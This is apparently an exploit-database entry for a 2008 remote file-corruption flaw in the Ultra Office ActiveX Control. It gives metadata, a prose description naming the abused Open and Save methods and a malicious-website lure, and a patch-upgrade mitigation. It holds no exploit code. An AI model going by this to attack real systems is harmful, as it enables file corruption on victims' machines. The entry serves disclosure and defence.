vendor:
Ultra Office ActiveX Control
by:
shinnai
9.3
CVSS
HIGH
Remote Arbitrary File Corruption
20
CWE
Product Name: Ultra Office ActiveX Control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3
2008
Ultra Office ActiveX Control Remote Arbitrary File Corruption
A vulnerability in Ultra Office ActiveX Control allows remote attackers to corrupt arbitrary files on the vulnerable system. This is due to the lack of proper validation of user-supplied input when handling the Open and Save methods. An attacker can exploit this vulnerability by enticing a victim to click a malicious link or visit a malicious website. This will cause the vulnerable ActiveX control to open and save a malicious file on the victim's system.
Mitigation:
Upgrade to the latest version of Ultra Office ActiveX Control or apply the vendor-supplied patch.
